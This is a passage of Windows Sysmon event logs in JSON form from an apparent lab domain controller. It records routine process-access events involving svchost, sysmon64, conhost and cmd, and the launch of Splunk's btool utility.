C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2930,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2931,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2932,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2933,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2934,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2935,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2936,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010A0070500}\r\nTargetProcessId: 1256\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010A0070500}","TargetProcessId":"1256","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2937,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.817\r\nProcessGuid: {A837DB8D-0236-5F25-0000-00105C080500}\r\nProcessId: 1320\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-0010A0070500}\r\nParentProcessId: 1256\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.817","ProcessGuid":"{A837DB8D-0236-5F25-0000-00105C080500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 